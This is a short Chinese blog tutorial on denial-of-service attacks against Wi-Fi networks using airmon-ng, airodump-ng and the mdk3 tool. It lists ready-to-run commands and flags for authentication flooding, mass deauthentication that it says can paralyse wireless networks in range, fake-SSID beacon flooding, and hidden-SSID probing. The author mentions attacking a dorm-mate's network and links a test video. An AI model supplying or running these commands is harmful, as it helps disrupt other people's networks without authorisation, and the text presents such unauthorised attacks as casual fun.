- 激活网卡为监听模式
airmon-ng start wlan0 - 扫描附近的无线信号
airodump-ng mon0 方法一:身份验证攻击这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应 mdk3 mon0 a
-a<ap_mac> #测试指定BSSID
-m#使用有效数据库中的客户端mac地址
-c#对应 -a ,不检查是否测试成功
-i<ap_mac> #对指定BSSID进行智能攻击
-s<pps> #速率,默认50 - mdk3 网卡 攻击模式 目标
mdk3 mon0 a -a MAC
以下是攻击宿友电脑创建的无线,效果如下。
方法二:伪造断开连接在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击! mdk3 mon0 d
-w<filename> #白名单mac地址列表文件
-b<filename> #黑名单mac地址列表文件
-s<pps> #速率,这个模式下默认无限制
-c[chan,chan,chan,...] #信道,可以多填,如 2,4,5,1 - mdk3 mon0 d -c 11
以下是方法二测试视频: http://my.tv.sohu.com/us/235484955/76316147.shtml 方法三:伪造AP产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋 mdk3 mon0 b -n<ssid> #自定义ESSID
-f<filename> #读取ESSID列表文件
-v<filename> #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a#WPA AES encryption
-m#读取数据库的mac地址
-c<chan> #自定义信道
-s<pps> #发包速率 mdk3 --help b #查看详细内容
方法四:探测AP信息和ESSID猜解模式 mdk3 mon0 p
-e<ssid> #待检测的ssid
-f<filename> #检测AP设置为隐藏的ssid列表文件
-t<bssid> #用bssid检测AP的信息
-s<pps> #速率,默认300
-b<characterset> #设置字符集
转载请注明出处(http://www./1993.html) 来源网站:几许博客
|